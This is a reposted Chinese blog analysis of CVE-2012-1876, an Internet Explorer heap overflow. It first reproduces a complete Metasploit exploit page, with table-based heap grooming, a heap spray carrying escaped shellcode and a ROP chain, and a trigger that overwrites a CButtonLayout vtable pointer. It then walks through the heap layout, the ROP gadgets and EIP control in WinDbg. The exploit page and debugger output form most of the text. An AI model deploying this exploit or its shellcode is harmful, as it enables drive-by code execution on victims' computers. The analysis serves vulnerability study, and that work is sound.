注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

【转载】CVE-2012-1876 EXPLOIT分析  

2014-08-01 13:43:36|  分类: 参考文章 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
本文转载自zenhumany《CVE-2012-1876 EXPLOIT分析》

CVE-2012-1876 EXPLOIT

1、Metasploit脚本

<html>

<body>

<div id="dGRr"></div>

<table style="table-layout:fixed" ><col id="0" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="4" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="5" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="6" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="7" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="8" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="9" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="10" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="11" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="12" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="13" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="14" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="15" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="16" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="17" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="18" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="19" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="20" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="21" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="22" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="23" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="24" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="25" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="26" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="27" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="28" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="29" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="30" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="31" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="32" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="33" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="34" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="35" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="36" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="37" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="38" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="39" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="40" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="41" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="42" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="43" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="44" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="45" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="46" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="47" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="48" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="49" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="50" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="51" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="52" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="53" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="54" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="55" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="56" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="57" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="58" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="59" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="60" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="61" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="62" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="63" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="64" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="65" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="66" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="67" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="68" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="69" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="70" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="71" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="72" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="73" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="74" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="75" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="76" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="77" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="78" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="79" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="80" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="81" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="82" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="83" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="84" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="85" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="86" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="87" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="88" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="89" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="90" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="91" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="92" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="93" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="94" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="95" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="96" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="97" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="98" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="99" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="100" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="101" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="102" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="103" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="104" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="105" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="106" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="107" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="108" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="109" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="110" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="111" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="112" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="113" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="114" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="115" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="116" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="117" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="118" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="119" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="120" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="121" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="122" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="123" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="124" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="125" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="126" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="127" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="128" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="129" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="130" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="131" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="132" width="41" span="9" >&nbsp </col></table>

<script language='javascript'>

 

var dap = "EEEE";

while ( dap.length < 480 ) dap += dap;

 

var padding = "AAAA";

while ( padding.length < 480 ) padding += padding;

 

var filler = "BBBB";

while ( filler.length < 480 ) filler += filler;

 

var arr = new Array();

var rra = new Array();

 

var div_container = document.getElementById("dGRr");

div_container.style.cssText = "display:none";

 

for (var i=0; i < 500; i+=2) {

rra[i] = dap.substring(0, (0x100-6)/2);

arr[i] = padding.substring(0, (0x100-6)/2);

arr[i+1] = filler.substring(0, (0x100-6)/2);

var obj = document.createElement("button");

div_container.appendChild(obj);

}

 

for (var i=200; i<500; i+=2 ) {

rra[i] = null;

CollectGarbage();

}

 

function heap_spray(){

CollectGarbage();

 

var shellcode = unescape("%u6c0b%u7c34%uf970%u7c36%u8b05%u7c34%uf970%u7c36%uf970%u7c36%u373a%u7c34%u0400%u0000%u44d0%u7c34%u0040%u0000%u1829%u7c36%uf036%u7c38%u2766%u7c34%u6c0b%u7c34%u0564%u7c35%u15a2%u7c34%u66ff%u7c37%ua151%u7c37%u8c81%u7c37%u5c30%u7c34%ub1b5%u92b6%u8790%u73d6%ud01b%u3cfd%u4a15%u918d%ud389%u04f8%u7649%u0c37%u48b7%ud52b%u9893%u43b2%u4247%u1d4b%ube99%u9f1c%ue001%ud423%u77b9%u2f78%u7c40%u7e41%u3d66%u4f9b%u3f46%ua9bf%u0d4e%uf50b%u972c%ue13b%u2527%u2d35%ub0bb%u7079%ub467%ue388%u6973%u97fd%ub125%u7eb0%u7476%u7c78%u4272%ube49%u90b6%ub891%u7543%ufc28%u1198%u1ce0%ue22a%u8066%ub4f8%ueb08%u993f%ua892%u2f04%ua94f%u0234%u85f5%u1dd4%u9340%u7b4a%ub737%u962d%ue181%u0c7f%u357a%ub948%u2446%u418d%ubf67%u300d%u3cf9%u9fba%u4e77%ub53d%u3147%u05d6%u3a15%u7dd5%u2c27%ubb9b%u4bb3%u71b2%u7b14%u1479%ufc32%u7a40%u9b67%u1276%u48fd%u8cb6%u24e1%uba98%ud621%u4291%u8447%ud5f6%u71a9%u6643%ue229%u277e%ub2b3%u2d78%u7072%u334e%uf9d1%u04b8%u4a7c%u0c73%ub51d%u4634%uf883%u759f%ub405%u998d%u0d7f%u0a77%u2fe3%uff09%uc1c6%u6be0%u4bd4%uf503%ubf41%u352c%u9215%u371c%u9796%ubebb%ub7b1%ub93d%u90a8%u7d3f%u493c%u7493%ub025%ueb38%u714f%u727b%u1a73%ubff9%u777d%ue239%u4327%u7975%u2066%uebd2%ub714%u9b2c%ufe86%uc0c7%u18d5%ue3d3%u973d%u49b2%ubb98%ub335%u707a%ub946%uf81b%ub6b4%u1cbe%u3f8d%u4278%u227c%u3cd6%u477f%u4e92%u0367%ub5f5%u8596%u11e0%u4ae1%u4874%u2d91%ua9b1%ub80c%u1576%u7ea8%u0b4b%u90fc%u9904%ufd2b%ub025%u2f40%uba34%u0d1d%u249f%u3705%u1a93%u4fd4%u8d41%u7679%uf869%u9005%u75b0%ueb19%ubf2c%u01b8%u3ce0%u787d%u9746%u93b7%uf687%u72d4%u3f41%ua835%u0a49%u73e1%u254b%u9b4f%u279f%u7bbb%u1c7a%u712d%u7c47%u3d77%u2f7f%ub3b9%u7e70%ua915%u0999%u37e3%u96b2%u23be%ud6d2%u4348%ub64e%u0cb5%u670d%u04b4%u4a40%u6634%u83b1%u74e2%u9242%u131d%ubafd%u9824%ufc80%uf52a%ud528%u147e%u8491%u81f9%u78e2%u7c71%ub035%u910c%ud108%uebc1%u8c34%u74e1%ue031%u734f%uf820%u9f97%u1066%u76d4%ub52d%ua9b3%ua81d%u7293%u257b%u793d%u3f75%u48bf%uf538%u7a9b%u7037%u672f%u7f42%ub847%u4bb6%ue33b%u4027%ube0d%u14b1%u9005%uf912%u2c7d%u77b7%u4a1c%u7f92%u3271%ud6d0%u3c7b%u437d%u8699%u79d5%ufd18%u988d%u4178%ubbba%u73b4%u9646%u7eb9%u7249%ub204%u3374%ue0f7%u8815%u24e1%u4e75%u307c%u96fc%u2170%u1de3%u4f90%ud66b%ubb2d%u397a%u37e2%ub7be%ua999%u49b5%u0576%u2977%u0ceb%ufc41%u6647%ub94b%u3cbf%u98b2%u89b3%ud4c0%uf93a%u8d1c%u4043%u0d97%u152f%ub44a%u9b24%u3dba%ub8f8%u349f%u924e%u3fb0%u27b6%u4648%u2c35%ufd02%u04b1%u4214%u6725%ua893%ud591%udbf5%ubdcb%u26aa%ude9b%u74d9%uf424%u2b58%ub1c9%u3149%u1968%u6803%u8319%ufce8%ud348%u3667%u1c05%uc798%u9475%uf67d%uc2a7%uabf6%u8077%u405b%uc4fc%ud34f%uc170%u5460%u373e%u654e%uf78f%ua51c%u8b8e%ufa5e%ub570%u0f90%uf271%ue0cd%uab23%u539a%ud8d3%u6fdf%u0ed2%ucf54%u2bac%ua4ab%u3506%u15fc%u7d1d%u1ee4%u5e79%uf215%ua29a%u7f5c%u5068%ua95f%u99a1%u9551%ua46d%u185d%ue06c%uc35a%u1a1b%u7e99%ud91b%ua4e3%ufcae%u2e44%u2508%ue374%uaece%u487a%ue985%u4f9e%u824a%uc49b%u456d%u9e2a%u4149%u4476%ud0f0%u2bd2%u020d%u94ba%u48ab%uc029%u12cd%u2526%uace3%u21b6%ude74%uee84%u482e%u67a5%u8fe8%u5dca%u1f4c%u5e35%u09ac%u0af2%u21fc%u32d3%ub197%ue6dc%ue237%u5972%u52f7%u0933%ub89f%u76bc%uc2bf%u1f16%u3855%u2af1%u5cb9%u430c%u60bb%ucf1f%u8632%uff75%u1012%u66e2%uea3f%u6793%u96ea%uec94%u6618%u055a%u7455%ue50b%u2620%ufa9a%u4d9f%u6f23%uc41b%u0774%u3121%u88b2%u14da%u01c8%ud74e%u6da7%ud79e%u3837%ud7f4%u9c5f%u8bac%ue37a%ub879%u76d6%ue981%ud18b%u17e9%u16f5%ue8b6%ua6d0%u3e8b%u2d1d%u34fd%ued4d");

 

while (shellcode.length < 100000)

shellcode = shellcode + shellcode;

var onemeg = shellcode.substr(0, 64*1024/2);

for (i=0; i<14; i++) {

onemeg += shellcode.substr(0, 64*1024/2);

}

 

onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

var spray = new Array();

 

for (i=0; i<400; i++) {

spray[i] = onemeg.substr(0, onemeg.length);

}

}

 

function smash_vtable(){

Math.tan(2,3);

var obj_col_0 = document.getElementById("132");

obj_col_0.width = "1178993";

obj_col_0.span = "44";

}

 

setTimeout(function(){heap_spray()}, 400);

setTimeout(function(){smash_vtable()}, 700);

 

</script>

</body>

</html>


2、利用分析

2.1 溢出地点后堆布局

function smash_vtable(){

Math.tan(2,3);

var obj_col_0 = document.getElementById("132");

obj_col_0.width = "1178993";

obj_col_0.span = "44";

}

当poc运行完下面的语句后,再次进入CTableLayout::CalculateMinMax函数。

id为123的table的CTableLayout的地址为:0x05029158

0:005> !heap -p -a ebx

address 05029158 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

05029150 002d 0000 [00] 05029158 00158 - (busy)

mshtml!CTableLayout::`vftable'

 

    0x050708e0为数组的起始地址

0:005> dc 05029158 + 0x90

050291e8 685fa594 00000024 00000009 050708e0 .._h$...........

050291f8 00000000 00000000 00000000 00000000 ................

05029208 00000000 00000000 00000000 00000000 ................

05029218 000000c8 000000c8 00000000 00000000 ................

05029228 00000000 00000000 00000000 00000000 ................

05029238 00000009 00000000 00000000 00000000 ................

05029248 00000000 00000000 00000000 00000000 ................

05029258 00000000 00000000 ffffffff 00000001 ................

 

 

HeapSpray后数组的内容如下:

0:005> dc 050708e0 lfc/4 + 100

050708e0 00001004 00001004 00001004 00000000 ................

050708f0 00450045 00450041 00010048 00001004 E.E.A.E.H.......

05070900 00001004 00001004 00000000 00450045 ............E.E.

05070910 00450041 00010048 00001004 00001004 A.E.H...........

05070920 00001004 00000000 00450045 00450041 ........E.E.A.E.

05070930 00010048 00001004 00001004 00001004 H...............

05070940 00000000 00450045 00450041 00010048 ....E.E.A.E.H...

05070950 00001004 00001004 00001004 00000000 ................

05070960 00450045 00450041 00010048 00001004 E.E.A.E.H.......

05070970 00001004 00001004 00000000 00450045 ............E.E.

05070980 00450041 00010048 00001004 00001004 A.E.H...........

05070990 00001004 00000000 00450045 00450041 ........E.E.A.E.

050709a0 00010048 00001004 00001004 00001004 H...............

050709b0 00000000 00450045 00450041 00010048 ....E.E.A.E.H...

050709c0 00001004 00001004 00001004 00000000 ................

050709d0 00450045 00450041 00010048 00000045 E.E.A.E.H...E...

050709e0 2deba1c9 88000000 000000fa 00410041 ...-........A.A.

050709f0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a00 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a10 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a20 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a30 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a40 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a50 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a60 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a70 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a80 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a90 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070aa0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070ab0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070ac0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070ad0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070ae0 00410041 00000041 2deba1a8 88000000 A.A.A......-....

05070af0 000000fa 00420042 00420042 00420042 ....B.B.B.B.B.B.

05070b00 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b10 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b20 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b30 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b40 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b50 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b60 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b70 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b80 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b90 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070ba0 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070bb0 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070bc0 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070bd0 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070be0 00420042 00420042 00420042 00000042 B.B.B.B.B.B.B...

05070bf0 2deba18b 8c000000 687484f8 0380b7d0 ...-......th....

05070c00 0506f7c0 68748690 00000001 00000000 ......th........

05070c10 01080809 ffffffff 00000000 00000000 ................

05070c20 00000000 ffffffff 00000080 ffffffff ................

05070c30 00000000 00000000 00000000 00000000 ................

05070c40 00000000 00000024 00000020 00000000 ....$... .......

05070c50 00000000 00000000 00000000 00000000 ................

05070c60 00000000 00000000 00000000 00000000 ................

05070c70 00000000 00000000 00000000 00000000 ................

05070c80 00000000 00000000 00000000 05070ca8 ................

05070c90 00000000 00000000 00000000 00000000 ................

05070ca0 00000001 00000001 00000000 00000000 ................

05070cb0 00000000 00000000 00000000 00000000 ................

05070cc0 ffffffff ffffffff ffffffff ffffffff ................

0:005> !heap -p -a 050709e0

address 050709e0 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

050709e0 0021 0000 [00] 050709e8 00100 - (busy)

050709e8为长度为100的字符A

 

0:005> !heap -p -a 05070ae8

address 05070ae8 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

05070ae8 0021 0000 [00] 05070af0 00100 - (busy)

 

0x05070af0 为长度为 0x100的字符B

 

0:005> ln poi(05070bf8)

(687484f8) mshtml!CButtonLayout::`vftable' | (68748690) mshtml!CButtonLayout::`vftable'

Exact matches:

mshtml!CButtonLayout::`vftable' = <no type information>

0:005> !heap -p -a 05070bf8

address 05070bf8 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

05070bf0 0021 0000 [00] 05070bf8 000fc - (busy)

mshtml!CButtonLayout::`vftable'

05070bf8为长度为00fc的CButtonLayout元素。


2.2 漏洞触发

在CalculateMinMax函数中,由于漏洞的触发,将溢出导致CButtonLayout的虚表指针被改写。

下面再0x05070bf8处下条件断点:

ba w4 0x05070bf8

运行后被断下:

可以看到,0x05070bf8的内容被改写为了07070024。

0x07070024 = 117899300(十进制)

 

07070024的内容如下:

0:005> dc 0x07070024

07070024 7c346c0b 7c36f970 7c348b05 7c36f970 .l4|p.6|..4|p.6|

07070034 7c36f970 7c34373a 00000400 7c3444d0 p.6|:74|.....D4|

07070044 00000040 7c361829 7c38f036 7c342766 @...).6|6.8|f'4|

07070054 7c346c0b 7c350564 7c3415a2 7c3766ff .l4|d.5|..4|.f7|

07070064 7c37a151 7c378c81 7c345c30 d18c67e0 Q.7|..7|0\4|.g..

07070074 4fe2c0fe b5b49b25 347bb08d 7f961c76 ...O%.....{4v...

07070084 054bf53b 72d669a9 46a8b166 eb3870be ;.K..i.rf..F.p8.

07070094 bfd48835 b3ba4e49 9092432c f831932d 5...IN..,C..-.1.

0:005> u 7c346c0b

MSVCR71!_pow_pentium4+0x33f:

7c346c0b c3 ret

7c346c0c 660f13442404 movlpd qword ptr [esp+4],xmm0

7c346c12 dd442404 fld qword ptr [esp+4]

7c346c16 83c410 add esp,10h

7c346c19 c3 ret

7c346c1a 660f124c240c movlpd xmm1,qword ptr [esp+0Ch]

7c346c20 660f121df076387c movlpd xmm3,qword ptr [MSVCR71!ABSVALMASK (7c3876f0)]

7c346c28 660f7ec8 movd eax,xmm1

0:005> u 7c36f970

MSVCR71!_strnicoll+0x77 [f:\vs70builds\3052\vc\crtbld\crt\src\strnicol.c @ 102]:

7c36f970 5d pop ebp

7c36f971 c3 ret

MSVCR71!_strupr [f:\vs70builds\3052\vc\crtbld\crt\src\strupr.c @ 50]:

7c36f972 6a18 push 18h

7c36f974 689823387c push offset MSVCR71!`string'+0x28c (7c382398)

7c36f979 e88d29fdff call MSVCR71!__SEH_prolog (7c34230b)

7c36f97e 33db xor ebx,ebx

7c36f980 895ddc mov dword ptr [ebp-24h],ebx

7c36f983 e8ae9cfdff call MSVCR71!_getptd (7c349636)

0:005> u 7c348b05

MSVCR71!wparse_cmdline+0x40 [f:\vs70builds\3052\vc\crtbld\crt\src\stdargv.c @ 244]:

7c348b05 94 xchg eax,esp

7c348b06 c3 ret

 

0x07070024为rop chain的内容,也就是heapspary后攻击者设置的内容。

 

2.3 Eip控制

在0x05070bf8处下读写断点:

ba r4 0x05070bf8

此处将会进入到rop chain。

 

0:005> dc ecx

05070bf8 07070024 0380b7d0 0506f7c0 68748690 $.............th

05070c08 70700248 07070024 07070024 07070024 H.pp$...$...$...

05070c18 00000000 00000000 00000000 70700248 ............H.pp

05070c28 07070024 07070024 07070024 00000000 $...$...$.......

05070c38 00000000 00000000 70700248 07070024 ........H.pp$...

05070c48 07070024 07070024 00000000 00000000 $...$...........

05070c58 00000000 70700248 07070024 07070024 ....H.pp$...$...

05070c68 07070024 00000000 00000000 00000000 $...............

0:005> dc eax+8

0707002c 7c348b05 7c36f970 7c36f970 7c34373a ..4|p.6|p.6|:74|

0707003c 00000400 7c3444d0 00000040 7c361829 .....D4|@...).6|

0707004c 7c38f036 7c342766 7c346c0b 7c350564 6.8|f'4|.l4|d.5|

0707005c 7c3415a2 7c3766ff 7c37a151 7c378c81 ..4|.f7|Q.7|..7|

0707006c 7c345c30 d18c67e0 4fe2c0fe b5b49b25 0\4|.g.....O%...

0707007c 347bb08d 7f961c76 054bf53b 72d669a9 ..{4v...;.K..i.r

0707008c 46a8b166 eb3870be bfd48835 b3ba4e49 f..F.p8.5...IN..

0707009c 9092432c f831932d 424a97bb 4791b841 ,C..-.1...JBA..G

0:005> kv

ChildEBP RetAddr Args to Child

0278d2d0 687e3cd4 0278d490 00000001 0278d490 mshtml!NotifyElement+0x3d (FPO: [0,0,1])

0278d300 687b25fc 0278d360 037bfd10 0278d490 mshtml!CMarkup::BuildDescendentsList+0x227

0278d3f8 687b257a 003eef50 0278d490 003ef014 mshtml!CMarkup::NotifyDescendents+0x78

0278d44c 687b20be 0380b7d0 00000000 00000000 mshtml!CMarkup::SendNotification+0x92

0278d474 686dd9e9 0278d490 037a9ba8 003f0188 mshtml!CMarkup::Notify+0xd6

0278d550 68600543 037a9ba8 00000001 003a6884 mshtml!CMarkup::SaveHistoryInternal+0x9c2

0278d578 686d5696 003f0188 037a92c0 0278d5d4 mshtml!CWindow::SaveHistory+0xa9

0278d588 6e34674f 003eef50 037a92c0 00000001 mshtml!CDoc::SaveHistory+0x1a

0278d5d4 6e346638 037a92c0 0278d5f8 6e3467be IEFRAME!CBaseBrowser2::_SaveHistory+0x10e (FPO: [Non-Fpo])

0278d5e0 6e3467be 003a679c 037a92c0 03769960 IEFRAME!CBaseBrowser2::SaveHistory+0x13 (FPO: [Non-Fpo])

0278d5f8 6e346779 003a679c 037a92c0 00000000 IEFRAME!CTravelEntry::_PersistHistoryToStream+0x38 (FPO: [Non-Fpo])

0278d620 6e349380 003a6734 00000000 003a679c IEFRAME!CTravelEntry::Update+0xde (FPO: [Non-Fpo])

0278d644 6e39b178 0034436c 003a6734 00000000 IEFRAME!CTravelLog::UpdateEntryEx2+0x3f (FPO: [Non-Fpo])

0278d688 6e426851 0034436c 00000000 00000000 IEFRAME!CBaseBrowser2::_UpdateTravelLogEx+0x18e (FPO: [Non-Fpo])

0278d6b0 6e39a236 00000000 00000043 00000000 IEFRAME!CBaseBrowser2::_ExecStandardGroup+0x190 (FPO: [Non-Fpo])

0278d6cc 6e3dd665 003a6744 00000000 00000043 IEFRAME!CBaseBrowser2::Exec+0x24 (FPO: [Non-Fpo])

0278d6fc 6e3dd56a 00000000 00000043 00000000 IEFRAME!CShellBrowser2::_Exec_CCommonBrowser+0x81 (FPO: [Non-Fpo])

0278d994 6e3bc655 003a6744 00000000 00000043 IEFRAME!CShellBrowser2::Exec+0x747 (FPO: [Non-Fpo])

0278d9c4 687af9d8 003d650c 00000000 00000043 IEFRAME!CDocObjectHost::Exec+0x186 (FPO: [Non-Fpo])

0278d9ec 68911972 00000000 00000043 00000000 mshtml!CTExec+0x3e

0278da04 68945d97 003e5498 0000031a 00000113 mshtml!CDoc::UpdateCurrentEntryAndAddNoNewEntry+0x14 (FPO: [0,0,0])

0278da18 6878e672 003c3a20 00001009 0278da4c mshtml!CDataRecovery::SaveDataCallback+0x3e

